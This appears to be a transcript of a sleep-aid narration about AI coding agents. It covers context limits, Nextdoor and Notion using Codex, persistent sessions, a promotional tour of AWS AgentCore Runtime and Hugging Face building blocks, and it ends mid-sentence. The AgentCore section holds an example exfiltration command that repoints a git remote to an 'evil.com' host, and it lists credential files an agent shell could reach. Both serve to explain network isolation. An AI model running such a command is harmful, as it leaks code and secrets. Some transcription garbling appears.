Welcome, dear listener. I'm Tina, scientist and lifelong terrible sleeper. I made AI for sleep to help ease my own restless nights, after I learned a busy mind tends to drift off when it's gently occupied, not forced quiet. So everything here is built to give your thoughts somewhere soft to land. Tonight we're going to explore something that's quietly unfolding in engineering teams around the world, something both thrilling and unsettling for those who live it every day. We're calling it the Codex moment, that threshold where the familiar rhythm of writing first drafts begins to fade, replaced by something entirely new. For senior engineers especially, this shift carries a weight that's hard to name, equal parts terror and excitement. Let's begin by understanding the fundamental constraints that make this transformation so profound, starting with the intricate relationship between what our AI colleagues can see and what they can truly comprehend. But first, a gentle observation. Most of the people who drift off to this channel have never actually hit subscribe. So if I've ever helped you in any way, you can return the favor with a simple and free action that will encourage me to keep going. Picture yourself working alongside a brilliant colleague who can write code faster than anyone you've ever met, but who can only focus on a small piece of the puzzle at any given time. Like a master craftsperson peering through a magnifying glass that reveals incredible detail but severely limits their field of view. This is the reality of deploying modern LLM-powered coding agents, where the economics of adoption hinge not just on the agent's raw code generation abilities, but on fundamental constraints that determine whether that intelligence can actually scale to solve complex real-world software problems. The most critical constraint facing coding agents today is the relationship between context windows and code-based complexity, creating an economic bottleneck that's more severe than most teams initially realize. Modern language models like GPT-4 and Claude have context windows ranging from 32K to 200K tokens, which sounds generous until you consider that a typical enterprise codebase contains millions of lines across thousands of interdependent files, like trying to understand a vast library while only being allowed to read a few pages at a time. This mismatch creates what we might call the keyhole effect, where the agent is essentially trying to understand and modify a vast interconnected system while only being able to see a tiny slice of it at any given moment. It's like trying to renovate a house while only being allowed to look through a keyhole, one room at a time, with no ability to step back and see how all the rooms connect to each other. The economic implications of this constraint are profound because they affect the types of tasks where agents can provide genuine value. Simple, localized changes, like fixing a bug in a single function or adding a small feature that doesn't require understanding complex dependencies, can often be handled effectively within the context window limitations. But as the scope of the required changes grows, the agent's effectiveness drops dramatically, creating a steep cliff rather than a gradual decline in utility. This leads to what researchers call the integration gap, where code that works perfectly in isolation often fails when deployed into the broader system context. Think of it like a skilled musician who can play any piece flawlessly when practicing alone, but struggles during ensemble performance because they can't hear how their part fits with the full orchestra, requiring extensive rehearsal and adjustment to achieve harmony. Think of this like a master chef who can prepare individual dishes perfectly, but has never worked in a restaurant kitchen during the dinner rush. The agent might generate syntactically correct, logically sound code for each component it's asked to modify. But ensuring that these changes don't break existing functionality, don't introduce performance regressions, and don't conflict with concurrent development work requires a different kind of systems-level understanding. The economics become particularly challenging because integration testing often reveals problems that require iterative fixes, and each iteration consumes both compute resources and human oversight time. It's like discovering that your beautiful new kitchen cabinet doesn't quite fit because you didn't account for the existing plumbing. So you need to make adjustments. then discover the adjustments affect the electrical work, and so on, with each round requiring both the carpenter's time and the homeowner's project management attention.
This brings us to a fundamental difference in how agent errors propagate compared to human developer errors, a distinction that significantly affects the economic value proposition. When experienced human developers make mistakes, they tend to be contextually informed, like a navigator who might choose a suboptimal route, but understands the local terrain well enough to recognize and correct course quickly when problems arise. Agent errors, by contrast, often stem from incomplete context or misunderstood requirements, and they tend to propagate through the system in ways that can be difficult to detect until much later in the development process. Imagine a translator who perfectly understands grammar and vocabulary, but occasionally misses cultural nuances. So their translations are technically correct, but sometimes convey subtly wrong meanings that only become apparent when native speakers try to use the translated document for important decisions. The compounding nature of these errors creates what economists call negative network effects in the development process. Each additional piece of agent-generated code potentially increases the surface area for subtle integration issues, and the cost of debugging these issues grows non-linearly, because they often involve understanding the interaction between multiple agent-generated components, each of which may be individually correct, but collectively problematic. This is where the gap between vendor claims and actual productivity measurements becomes most apparent, and understanding this gap is crucial for making rational adoption decisions. Vendor benchmarks typically focus on isolated coding tasks, like solving algorithmic problems or generating functions that meet specific requirements, which is like evaluating a car's performance by testing it on a perfectly smooth test track with no traffic, weather, or navigation challenges. Research on developer productivity reveals a more nuanced picture that challenges vendor benchmarks focused primarily on code generation speed. Academic studies consistently show that while LLM agents excel at isolated coding tasks, they struggle with the broader context awareness that dominates real software development work. Activities like understanding legacy system constraints, navigating complex dependency relationships, and maintaining consistency with evolving architectural decisions that represent the majority of professional development time. Think of software development like conducting an orchestra, where writing new musical passages, while important, is just one part of the conductor's job. The conductor also needs to understand how each section relates to the others, ensure that timing and dynamics work across the entire ensemble, adapt to the acoustic properties of the concert hall, and respond to the subtle variations that each musician brings to their part. The most successful coding agent deployments tend to occur in environments where these economic constraints are explicitly acknowledged and worked around, rather than ignored. Organizations that see genuine productivity gains typically start by identifying tasks that naturally fit within context window limitations, have well-defined interfaces that minimize integration complexity, and include robust testing frameworks that can catch errors quickly before they compound. This creates an adoption pattern that looks like a careful expansion from the center outward, like a gardener who starts with a small, well-tended plot and gradually expands the cultivated area as they develop better tools and techniques, rather than trying to transform the entire landscape at once. The economics favor incremental adoption, where each successful use case builds confidence and infrastructure for tackling slightly more complex challenges. Looking forward, the economic landscape for coding agents will likely be shaped by advances in context window size, improvements in code understanding and navigation techniques, and the development of better integration between agents and existing development toolchains. But understanding the current constraints helps us make realistic assessments
of where these tools can provide genuine value today, rather than being swayed by demonstrations that, while impressive, may not reflect the messy realities of production software development. Take a moment to let that sink in. This tension between the incredible detail these systems can perceive and the narrow window through which they might work.
It's a constraint that shapes everything, like trying to understand a vast story while only being allowed to read a few pages at a time. You don't need to solve this puzzle tonight. Just rest with the understanding that these limitations are real and meaningful.
Now, let's see how this plays out in the real world, with engineering teams who are living through this transformation day by day, starting with a company that connects neighbors across 11 countries.
Picture a massive neighborhood network, like a web of interconnected front porches stretching across continents,
where over 110 million people connect with their local communities across 11 countries. That's the scale at which Nextdoor operates, and it's created some fascinating changes in how their engineering teams actually build software.
For Corey Dolphin, Nextdoor's head of engineering, the introduction of Codex OpenAI's code-generating AI system has fundamentally shifted their approach from what he calls iteratively prompting an agent to something much more strategic. Outcome engineering, where engineers start with the end result they want to achieve and work backward with AI assistance to make it happen. Think of it like the difference between asking someone for turn-by-turn directions versus showing them a photo of your destination and saying, "Get me here." Engineers can now focus on the what and why, while Codex handles much of the intricate how, freeing up mental bandwidth for higher-level product thinking. This shift has allowed individual engineers to move up the stack, like a craftsperson who once specialized in making just clock springs, now being able to assemble entire timepieces. They're no longer locked into narrow specializations within specific systems or frameworks, but can own product experiences end-to-end across multiple platforms. The productivity gains have been so dramatic that engineering itself is no longer the bottleneck at Nextdoor. Instead, the constraint has shifted to those harder strategic questions about what to build next. Like a factory that's become so efficient at manufacturing that the real challenge becomes deciding which products the market actually needs. As Dolphin puts it, Codex has fundamentally changed how we think about engineering, to the point that we can't even imagine engineering without it. Engineers now spend far less time thinking about exactly how they'll build something, and much more time considering the desired outcome, whether that's mock-up screenshots, performance benchmarks, test results, or entirely new feature concepts. A concrete example emerged with Nextdoor's recent Opportunity Alerts feature, designed to help people find local service providers. Imagine a digital bulletin board that automatically connects neighbors with the handy people, tutors, and contractors they need, all based on proximity and availability. During development, one engineer realized it would be valuable to display these service providers on an interactive map, like pins scattered across a neighborhood street grid. Historically, this kind of cross-platform feature would have demanded coordination between 3 separate teams: mobile, front-end, and back-end engineering. Such features often languished in backlogs, like items on a shared to-do list that everyone agrees would be nice to have, but no single team has the bandwidth to champion through the complex handoffs and integration work required. But with Codex assistance, Nextdoor was able to have one engineer build the entire mapping feature end-to-end, like a single architect who can now design, engineer, and construct a complete building rather than just contributing one specialized component to a larger team effort. This approach means engineers can drive product development faster while gaining a deeper understanding of the actual user experience. They're not just implementing a specification handed down from elsewhere, but actively shaping what gets shipped
based on their direct engagement with the full product stack.
As Dolphin observes, as engineers start to shift up the stack, they get to be more responsible for the product that they're building. You really see individual engineers start to drive products, like promoting skilled technicians to become project managers who can see and influence the bigger picture. Beyond feature development, Nextdoor leverages Codex for some of their most challenging debugging scenarios, particularly when working with embedded Rust databases and systems prone to intricate race conditions. Those fleeting timing issues that appear and disappear like shadows, often impossible to reproduce consistently. The team provides Codex with clean testing environments and debugging harnesses, like setting up a controlled laboratory where variables can be isolated and examined systematically. Then uses the AI for everything from diagnosing why Kubernetes pods refuse to start to identifying the right trend lines in complex data analyses. Dolphin notes that with GPT 5.4 and 5.5, the improvements have been particularly impressive. Codex excels at persistent investigation, diving deep into seemingly esoteric technical details like a detective who won't give up on a cold case, methodically following every lead until it reaches the root cause. The team has become particularly enthusiastic about fast mode with Codex and GPT 5.5. And as Dolphin admits, I've got to be honest, a lot of the team are addicted to it. The quick feedback loop creates an almost exhilarating engineering experience, like having a conversation with your code where responses come back in seconds rather than hours. This acceleration has compressed software engineering timelines so dramatically that it's shifted organizational pressures elsewhere, like water finding new channels when a dam is removed. The bottlenecks have moved away from the actual building process and towards strategic decision-making about what should be built in the first place. As Dolphin reflects, we're moving so much faster that the bottlenecks are no longer in engineering. It's really now a question of how can we identify the right things to build and the right strategy, and less about how we actually build it, suggesting that the fundamental constraint in software development may be shifting from execution capacity to strategic clarity and product vision.
Feel how this changes the very nature of the work, doesn't it? This shift from asking for directions to simply pointing toward a destination. Corey's team at Nextdoor discovered something profound about what happens when engineers can focus on outcomes rather than getting lost in the intricate steps. Let yourself sit with that possibility for a moment. There's no rush to figure out what this means for you. Now let's visit another team at Notion, where a different kind of transformation has been quietly taking shape.
Picture a workshop where the fundamental tools are quietly transforming, where the hammers and saws you've relied on for years are suddenly capable of working on their own while you sleep. At Notion, this transformation isn't hypothetical. It's reshaping how an entire engineering team approaches their craft, thanks to an AI system called Codex that's rewriting the rules of what a small team can accomplish. Ryan Nystrom leads AI product engineering at Notion, and over the past year, his team has built or touched nearly every AI feature that users interact with in the product. What he's discovered is that Codex doesn't just write code faster, it fundamentally changes the nature of the work itself, unlocking possibilities that seemed out of reach for a team of their size. Think of Codex like a master craftsperson who takes time to study the blueprints, understand the existing structure, and plan carefully before making the first cut. Ryan appreciates that Codex doesn't rush into building something that will need extensive cleanup later, instead producing work that matches Notion's codebase standards right from the start, as if it had been written by a seasoned team member who intimately knows the house style. This thoughtful approach showed up clearly when Ryan needed to bring Notion's AI voice input feature to the web platform. The mobile app already had this capability, where users could speak naturally instead of typing, providing much richer context in their questions, like the difference between sending a quick text message and having a full conversation over coffee. Even though Ryan wasn't entirely sure how the mobile implementation worked under the hood, he was able to hand the problem directly to Codex. He pointed it toward the existing mobile codebase, provided a clear description of how the feature should behave on the web, and gave it a way to verify the results, like getting a skilled contractor the keys to examine the original building before constructing the addition. Codex spent considerable time exploring the mobile code, understanding the patterns and architecture, then returned with a complete first implementation of the web feature in a single attempt. The code matched Notion's conventions so closely that Ryan was able to ship it the next day and immediately begin user testing. The time savings were dramatic, like the difference between hand digging a foundation and bringing in the right machinery. What would have taken Ryan and another engineer 2 full weeks to complete just 2 years ago, he accomplished entirely on his own in 3 or 4 hours, with Codex handling the implementation work. This shift has fundamentally changed how engineers at Notion approach their daily work. Instead of sitting at their keyboards typing line by line, they're spending more time crafting detailed specification documents, like architectural plans that Codex can follow, while they focus on other tasks or step into meetings. The team can now run multiple projects in parallel, firing off tasks without losing the collaborative support that used to create bottlenecks. It's like having a workshop where multiple projects can proceed simultaneously, each with its own dedicated craftsperson working steadily while you coordinate and plan the next phases. For Ryan, who manages the team, this represents a particularly meaningful change. Traditionally, managers drift away from hands-on coding as meeting schedules and team support consume their time, like a master chef who gradually spends more time planning menus and less time at the stove. But now, Ryan can build complete features solo, while still providing the support his team needs. After 5+ years in management, he's able to dive deep into coding problems again, something he thought he had permanently traded away for the responsibilities of leadership. The workflow has become beautifully asynchronous, like tending a garden where you can plant seeds in the morning, attend to other areas throughout the day, and return in the evening to find new growth. Ryan can queue up a task, head into a block of meetings, and return to find a finished feature waiting for review. This availability extends beyond normal working hours in ways that feel almost magical. Ryan can pose a research question before going to bed. Let Codex work through the night like a diligent scholar in a library, and wake up to a completed report with findings and analysis ready for the morning. What emerges from this transformation is a reset of expectations around team capacity. Codex has fundamentally changed the baseline for what a small team or even a single engineer can ship in a given time frame, creating more space for the creative and strategic work that engineers find most fulfilling. Ryan describes it simply as having an intern available 24 hours a day, ready to research tasks, fix bugs, or implement tweaks whenever the need arises. But unlike a traditional intern, this one never needs training, never gets tired, and consistently produces work that meets professional standards right from the first attempt. As you drift towards sleep tonight, consider how this quiet revolution at Notion represents something larger happening across the software industry, where the fundamental relationship between human creativity and computational capability is being rewritten one code base at a time, creating new possibilities that we're only beginning to explore.
Notice how Ryan's discovery feels both practical and profound, The way Codex doesn't just work faster, but actually changes what becomes possible for a small team to accomplish. Like having a collaborator who takes the time to understand before acting. You can simply rest with this idea. No need to hold on to every detail. Let's explore what happens when we move beyond single conversations with these systems into something more sustained and persistent.
Picture a conversation that flows naturally across days and weeks, where you can start discussing a complex coding problem on Monday. Leave detailed notes about your approach, and return on Thursday to find that your AI collaborator remembers not just what you were building, but why you made specific design choices and what experiments you tried along the way. This is the promise of persistent agent conversations, where modern coding agents like Claude Code and Codex maintain context across multiple sessions rather than starting fresh each time. For simple, one-off tasks, stateless interactions work beautifully, like having a brilliant consultant who can solve any isolated problem you bring them, but doesn't need to remember your previous discussions. But when we ask LLM agents to help with substantial software projects that evolve over time, session persistence becomes crucial for maintaining the context and momentum that makes collaboration genuinely productive. Consider how human developers naturally work on complex code bases. They build up mental models over time, remember previous debugging sessions, understand the historical reasons behind architectural decisions, and maintain awareness of ongoing refactoring efforts across multiple files. This accumulated context isn't just helpful, it's essential for making good decisions about where and how to make changes, without introducing subtle bugs or architectural inconsistencies. Modern persistent agent systems attempt to recreate this natural development flow by maintaining conversation history, file states, and learned patterns across multiple interactions. Think of it as giving the agent a proper notebook where it can jot down insights, track decision rationales, and build up a personalized understanding of your codebase's quirks and conventions, rather than approaching each conversation as if meeting for the first time. The most fundamental requirement for persistence is conversation continuity, where the agent remembers not just what code was discussed, but the reasoning behind decisions, failed approaches that shouldn't be repeated, and evolving requirements that have emerged through the collaborative process. This creates a compound effect, where each interaction builds on previous insights, rather than starting from zero context. Tool integration becomes equally important in persistent sessions, because real development workflows involve maintaining connections to external services, remembering API responses that inform ongoing work, and building up familiarity with project-specific debugging techniques that prove effective for particular code bases or development environments. Then there's the delicate matter of context prioritization, which is like managing a sophisticated filing system where the most relevant information stays easily accessible, while older, less critical details are archived but remain searchable when needed. Modern agents must learn to surface the right historical context for each new conversation, without overwhelming their working memory with irrelevant details. The economic implications of persistent contexts are significant, because they fundamentally change the value proposition from fast code generation to collaborative development partnership, where the agent becomes more valuable over time as it learns your preferences, coding style, and project-specific constraints, rather than remaining a generic coding assistant. Multi-project context management adds another layer of sophistication, like maintaining separate but connected workspaces for different clients, where insights from one project might inform approaches in another, but sensitive details remain appropriately compartmentalized to respect privacy and confidentiality boundaries. This persistent approach aligns with how modern coding agents like Claude Code and Codex are actually being deployed in practice, where the most successful implementations involve ongoing collaboration,
rather than isolated task completion, building up shared context that makes each subsequent interaction more efficient and contextually appropriate.
The conversation persistence model offers advantages that traditional isolated execution environments cannot match,
because the real bottleneck in collaborative coding isn't computational resources or security isolation, but maintaining the rich context that enables truly helpful suggestions and decisions that align with broader project goals and constraints. Modern LLM agents excel in this persistent conversation model because they can leverage their training on vast code repositories to recognize patterns and suggest approaches that fit naturally with established code bases, while learning from feedback and corrections to refine their understanding of project-specific requirements and preferences.
The infrastructure supporting these persistent conversations focuses on maintaining conversation history,
tracking file changes over time, and providing APIs that external development tools can use to query agent insights or request code analysis, creating an integration pattern that fits naturally into existing development workflows.
Security in persistent conversation systems
Centers on access control and audit trails rather than runtime sandboxing, ensuring that agents only access repositories and services they're authorized for, while maintaining detailed logs of all suggestions and changes for compliance and debugging purposes.
The monitoring requirements for persistent agent conversations involve tracking conversation quality over time,
measuring the accuracy of suggestions as code bases evolve, and detecting when agents might benefit from updated context or training to maintain their effectiveness as collaborative partners.
Context compression techniques become crucial for managing long-running conversations that might accumulate months of development history.
Using approaches similar to how LLMs summarize and prioritize information to keep the most relevant details accessible while archiving comprehensive records for future reference.
The success metrics for persistent agent systems focus on collaborative outcomes rather than isolated task performance,
measuring factors like how often agent suggestions are accepted over time, how effectively agents learn project-specific patterns, and how much they reduce the cognitive overhead of context switching between different development tasks.
Integration with version control systems provides natural persistence boundaries where agents can track changes across commits and branches, understand the evolution of features over time, and provide insights that take into account both current code state and historical development patterns. The balance between persistence and fresh perspective ultimately comes down to designing conversation systems that feel natural and productive for human developers, maintaining enough context to be genuinely helpful, while remaining adaptable enough to embrace new approaches and learn from evolving project requirements, creating a collaborative dynamic that improves over time.
I'm curious how this one sits with you. Does the idea of where all of this is heading comfort you or quietly unsettle you? Tell me in the comments. I read them on my own sleepless nights. Can you feel the difference between those two ways of working? One brilliant but fleeting, the other building understanding over time, like a conversation that deepens across many evenings. Session persistence isn't just a technical feature. It's about creating space for real collaboration to grow. Let that settle gently as we turn to something more immediate and tangible. The quiet habits that are already changing in offices everywhere.
There's a new habit spreading through tech offices, and you've probably seen it. This careful cradling of half-open laptops between meetings, the nervous glance at the screen during one-on-ones to make sure it hasn't gone dark, the awkward commute home with a laptop that absolutely cannot be closed because somewhere inside that machine, a coding agent is working. It's Claude Code, or Codex, or Kiro, or whatever harness the developer has wired together, and it needs 5 simple things to function: a shell, a file system,
the project checked out with its dependencies installed, and the right permissions to act on files and reach the network.
Your laptop provides all 5. But think of it like this. Your laptop won the job the way the nearest restaurant wins when you're hungry. Not because it's the best choice, but because it's right there. Amazon Bedrock Agent Core Runtime offers something different. A dedicated environment for every session, like giving each coding agent its own private workshop, instead of making them all share your cluttered garage. Each agent gets an isolated Linux micro VM with persistent workspace, a real shell, and deterministic command execution. But the harder parts, the ones teams usually build by hand, come assembled out of the box. There's an identity layer, so the agent acts as the user who triggered it. A gateway that gives all these different agents the same set of tools: GitHub, Jira, Slack, your own services, through one model context protocol endpoint, with the real tokens held safely outside the agent's reach. And there's observability. So every step the agent takes lands in the Amazon CloudWatch your team already uses. Which means when you close that laptop lid, you're not flying blind. Before we dive deeper, let's talk about why your laptop was never the right host for this work, starting with the most obvious problem. Your laptop is your affected zone, like letting a house guest rummage through your personal belongings while you're trying to use them too. The agent shares your shell, your file system, your tokens, your VPN, your loaded SSH keys, and one prompt-injected README becomes one prompt-injected README too many when it has access to everything you do. Then, there are the secrets sitting right next to the code the agent edits. Those .env files, the /aws/credentials, /ssh/id ed 25519. That one /npmrc with the private registry token, all reachable from the same shell the agent runs in. The principle of least privilege, well, it hasn't been observed here. It's like handing someone your house keys when they only need to water the plants. Git worktree is a half-fix for parallelism, the standard play for running 2 agents at once. Spin up worktrees for 2 branches and point 1 agent at each, but they're still sharing the same machine underneath. Picture it like this. You have 3 chefs trying to cook different meals in the same kitchen. They're going to fight over the same stove, the same counter space, the same ingredients, even if they're working on completely different recipes. 3 agents on 3 branches are 3 processes fighting over one host. The same Postgres on localhost 5432, the same port 3000 your dev server wants, the same SSH keyring, the same outbound IP, the same /OIS/credentials. And then there's the laptop lid, which becomes an accidental kill switch. Suspend the laptop, and the agent suspends with it. Close it for a meeting and lose the session. Close it for a flight and lose the workspace. Half-installed dependencies, a partially applied refactor, a still-running test suite, all gone with the lid, like a power outage in the middle of a delicate surgery. The longer the job, the worse the math becomes. A 90-minute refactor or an overnight migration means the lid must stay open for 90 minutes or all night, which means shipping a feature shouldn't depend on the angle of a laptop hinge. If you're a developer, you want the laptop experience without the laptop limitations. Same agent, same shell, same file system, same instant feedback, but the lid can close, multiple agents can run side by side, and the work survives a reboot, a flight, or a long lunch. If you're on a platform team, you want what you always want. Each agent with its own scope. Traffic flowing through your VPC instead of the public internet. Identity tied to the company identity provider instead of a .env file. You want AWS CloudTrail records of every invocation, CloudWatch traces of every step,
Tool access mediated by a policy layer instead of /netrc. Credentials that are not sitting on disk inside an LLM-controlled environment. Agent Core lets you bring any agent. You can host Claude Code, Codex, Kiro, OpenCode, Cursor CLI, Gemini CLI, your own harness, and you can package anything into a container or a zip file. Push the container to Amazon Elastic Container Registry or zip deploy a Python or Node.js project directly. You can bring your own dependencies in the image, language runtimes, build tools, Git, system packages, whatever the agent needs from the developer's machine.
The runtime is model agnostic.
Think of it like a universal adapter. The harness picks the model and the path it takes to get there. And there are 3 routes, all equally fine.
Through Amazon Bedrock, which hosts Anthropic's Claude family, and as of recently, OpenAI models,
along with others like Nova, Llama, Mistral, Qwen, Kimi.
Directly via the provider, Anthropic's Claude API, OpenAI's API,
Google, other providers, or self-hosted models are still reachable over HTTPS.
Or through your own LLM gateway, if you've already standardized on one for routing, fallbacks, and cost controls.
Pick the route that fits your security posture. Runtime doesn't have an opinion about it.
The Amazon Bedrock route has the property that the prompts, the tokens, and the outputs don't leave the AWS network, which is usually the first thing internal security teams ask about. Each session runs in its own Firecracker micro VM, like having a separate workshop for each craftsperson instead of making them all share tools and workspace. Spin up N of them in seconds. Run the same agent against 10 branches. Run 3 different agents against the same ticket and see who performs better. A/B test Claude Code on Opus against Codex on the GPT class model against Kiro on any of those. Same prompt, same repo. 3 independent kernels, 3 independent file systems. No localhost 5432 collisions. Like having 3 completely separate laboratories instead of one shared bench. A managed container on its own isn't a workstation, but 4 capabilities turn it into one, starting with persistent MNT workspace that survives stop and resume. Managed session storage gives every session a 0 config persistent directory. Think of it like a desk drawer that stays organized exactly as you left it, even when you switch to a completely different desk. The agent writes files. The files are there next time. Node modules, .git, build caches, project files, the half-applied refactor, all available in the exact state the agent left them. When the micro VM idles out, the file system stays. Resume the same session ID, and a fresh micro VM mounts the same file system in milliseconds. The data is held for 14 days of inactivity. There's no need for FileWatcher syncing to S3, no SIGTERM flush logic, no Git bundle persistence. Teams have built all 3 by hand, repeatedly, like reinventing the wheel every time they need to move something. Starting June 5th, Agent Core Runtime introduced interactive shells for terminal access into agent sessions. Agent Core Exec TAS now opens a PTY-backed shell straight into the running micro VM. Colors, tab completion, Control-C, terminal resize, reconnect on network drop are all built in. The coding harness running on the remote environment starts feeling like your local terminal. The more interesting part is what you do with more than one. Open 3 terminals, attach each to a different micro VM. Watch 3 agents work 3 branches in parallel, like a conductor watching 3 different orchestras perform simultaneously. The connection isn't precious. Close the laptop, open it tomorrow, reattach to the same shell.
Each interactive session has two IDs that matter: the runtime session ID for which micro VM and the shell ID for which shell inside the micro VM.
Brief network drops reconnect automatically.
Longer ones print the resume command and let you reattach by hand whenever you're ready, like a bookmark that remembers not just which page you are on, but exactly which paragraph.
The terminal isn't the only way to drive the environment.
Anything you can run inside an Agent Core exec-it shell. Your application can also run directly, without an LLM in the middle.
When the operation is already deterministic,
Run the test suite, push the branch, install a dependency, fetch a dataset. You can skip the model entirely, like taking the express lane when you know exactly where you're going.
invoke agent runtime command sends shell commands straight to the micro VM
The agent is already working in, streaming stdout and stder back over HTTP2. No need to have the model in the loop. No token spend, no probabilistic decision about whether the push happened. For data shared across sessions and agents, your team's skills library, a shared dependency cache, golden artifacts from a previous pipeline, you can mount Amazon S3 files or Amazon EFS access points as POSIX directories inside every session. Up to 5 mounts per runtime, like having a shared toolshed that every workshop can access. Drop a skill into S3 files, and every agent on the team picks it up at /mnt skills on the next invocation. A coding agent that can only edit files isn't useful for long. Sooner or later, it has to open a pull request, comment on a Jira ticket, push to a private registry, page someone in Slack.
The wrong way to make that happen is to drop your GitHub credentials
or any other access token into user/netrc inside the micro VM and hope nobody asks, like leaving your credit card on the counter and trusting everyone who walks by.
Agent Core Gateway is where the tool catalog lives, and Agent Core Identity holds the credentials behind it.
Long-lived secrets in AWS Secrets Manager, short-lived tokens cached in its token vault.
You register the tools a coding agent needs once,
and Gateway exposes a single MCP endpoint speaking the streamable HTTP transport Claude Code, Codex, Cursor, Kiro, and OpenCode already use. 3 patterns cover most coding workflows. The bot pattern for agents acting on their own. You create a GitHub bot, mint a fine-grained personal access token scoped to specific repos, and register it as an API key credential. The on behalf of pattern for agents acting as a person. The developer signs in via your IDP. Identity mints a workload access token and exchanges it for a GitHub scoped one. PRs are attributed to the human, not a shared bot.
And the broker pattern for cases where you want full control of the credential flow, like GitHub app installation tokens that need a self-signed JWT. You point the gateway target at a Lambda that handles the authentication dance.
Most of what a coding agent actually does isn't an MCP tool call. It's npm install, git clone, cargo build, pip install, shell commands talking straight to the internet, like a carpenter using basic tools most of the time, not the fancy specialized ones. Agents hosted on Agent Core Runtime can live inside your VPC, which means you decide what the internet looks like from inside the micro VM. The agent runs pip install pandas. Your Route 53 private zone resolves pypi.org to your internal pypi mirror. Your security group allows outbound 443 to GitHub Enterprise's IP ranges and nothing else. An injected Git remote set URL origin https evil.com/exfil.git and Git push fails at the TCP level.
the SYN packet doesn't leave the subnet.
Every invocation lands in AWS CloudTrail. Every session sends open telemetry traces to Amazon CloudWatch, along with built-in metrics for session count, latency, duration, token usage, and error rates. Each micro VM can run for up to 8 hours or as little as a minute when a session sits idle past the idle runtime session timeout. 15 minutes by default, but configurable. The compute shuts down on its own. Either way, MNT workspace, S3 files, and EFS stay where they are. The next time you invoke the same session ID, a fresh micro VM mounts the same files, and the agent picks up where it left off, like a librarian who always remembers exactly which books you had checked out. You don't pre-pick a CPU or memory size. Billing tracks actual CPU consumption, so I/O weight costs nothing extra, and the rolling peak memory used so far. Run hundreds of sessions side by side and pay only for the resources each one actually consumes. Many teams already run coding and other types of agents on Agent Core. Thomson Reuters built CoCounsel, combining dynamic code generation with trusted professional content for legal workflows, using the same execution loop that powers Claude Code. The companion GitHub repo turns these concepts into 3 runnable experiments. Each one starts the same way. Your application calls Agent Core runtime once per agent. Each call lands in its own micro VM. Race mode. Who fixes it first? Pick a GitHub issue, hand it to 4 agents at the same time, and see who wins, like hosting a friendly competition between different problem-solving approaches. Bench mode. Who fixes it best? Same setup, but instead of declaring a winner, the script grades everyone, writing latency, dollar cost, and test pass rate per run into a CSV. Watch mode. Looking over the agent's shoulder. 1 long-running refactor agent, 2 hours running unattended. While it works, you open a terminal locally and run Agent Core exec-it against the same session. You're now inside the same micro VM as the agent, like having a window into the workshop while the craftsperson works. Tail logs, read a stack trace, or drop a note into a file the agent rereads at the start of its next step. Many tabs, many windows, each one wired to a different micro VM. The laptop went from doing the work to helping you provide oversight to a fleet of agents, like switching from being a solo performer to conducting an entire ensemble. You can close the lid now. Go to dinner, take the kid to soccer, or sleep. The agents you started are still running, each in its own micro VM, each calling tools through Gateway under the identity and IAM controls your platform team set up. When you open the laptop tomorrow, reuse the same session IDs and you're back where you left off. On every one of them, the cracked open laptop wasn't a flex. It was a workaround for a missing system. Bring any coding agent. Bring any model. Agent Core brings the rest. Now go put your laptop in your bag. Close it with confidence and let the agents do what they do best, while you do what you do best. There's something both endearing and revealing about this image, isn't there? The careful cradling of laptops, the nervous glances, the agents working while we sleep. It speaks to how quickly we've adapted and how our tools are adapting too. Your laptop won this job simply by being there, but that doesn't mean it's the best choice. Rest with that thought as we explore what happens when agents gain access to more sophisticated environments designed just for them. Picture a coding agent being asked to build something extraordinary, a beautiful 3D gallery showcasing the monuments of Paris, where each landmark spins and rotates as interactive Gaussian splats, and the human never once opened an image generator, never touched a 3D reconstruction tool,
Yet somehow the agent delivered a complete cinematic website by orchestrating 2 separate AI models on Hugging Face.
This remarkable feat happened because we're witnessing what Mitchell Hashimoto calls the building block economy, where software development is shifting away from building monolithic applications from scratch toward assembling small, well-documented components that agents can wire together like a child connecting Lego bricks, each piece designed to snap perfectly into the next.
Hashimoto's key insight cuts right to the heart of how AI agents actually work best. They're decent at building everything from the ground up, but they truly excel at gluing together proven pieces. Much like how a master chef might not grow their own wheat, but can brilliantly combine the finest ingredients from different suppliers into something entirely new.
This building block approach has been transforming code libraries for years. But now, the same forces are reshaping multimedia AI in ways that feel almost magical.
Because the real challenge was never the sophistication of the models themselves.
It was always the tedious integration work. The SDKs and weight files and GPU configurations and input format conversions and polling mechanisms that made chaining AI models feel like trying to connect garden hoses with incompatible fittings.
Hugging Face spaces have quietly solved this integration nightmare by becoming standardized, callable blocks that agents can discover and use without any custom integration code. Each space now exposing a simple text file called agents.md that serves as a universal instruction manual. When an agent queries a space's agents.md file, it receives everything needed in one clean response: the API schema location, the call and pull templates, file upload procedures, and authentication requirements, all laid out like a perfectly organized toolbox where every tool has its labeled place. The magic happens in the chaining, where the output of one space flows seamlessly into the input of the next, creating pipelines that transform a simple text prompt into an image, then that image into a full 3D model, like water flowing through a series of connected pools, each one adding something new. For the Paris gallery, the agent orchestrated exactly 2 spaces. First, calling ideogram AI/ideogram4 to generate clean specimen shots of each monument against dark backgrounds, turning the Eiffel Tower into a little diorama on a plinth, then feeding those images to vast AI/triposplat to reconstruct 3D Gaussian splats from each single photograph. The agent didn't stop at just calling the models. It handled all the glue work too, noticing that triposplat outputs were Y down and automatically flipping them upright, auto-framing each monument for optimal viewing, compressing the PLY files to K-splat format for 3 times smaller file sizes and faster loading, then building a complete 3JS viewer with scroll to switch and drag to rotate controls. The human's role became purely curatorial, offering taste-level guidance like make it zoomed out, or replace the obelisk with something better for splatting, or the transition lingers too long, while the agent handled all the technical execution and even learned from reality, discovering that wide glass pyramids splat poorly and thin obelisks look dull. This represents the outsourced research and development loop that the building block economy promises, except instead of lengthy development cycles, the R&D became a conversation, with the agent rapidly iterating based on feedback and the inherent constraints it discovered in the 3D reconstruction process. The true test of any building block system is reusability. And once this Paris pipeline existed, creating entirely new galleries became almost trivially simple, with commands like create a similar space with splats for Japan, resulting in complete new applications, each featuring 6 monument images, 6 3D splats, compression, a custom viewer. The Egypt gallery showcased the Great Pyramid,
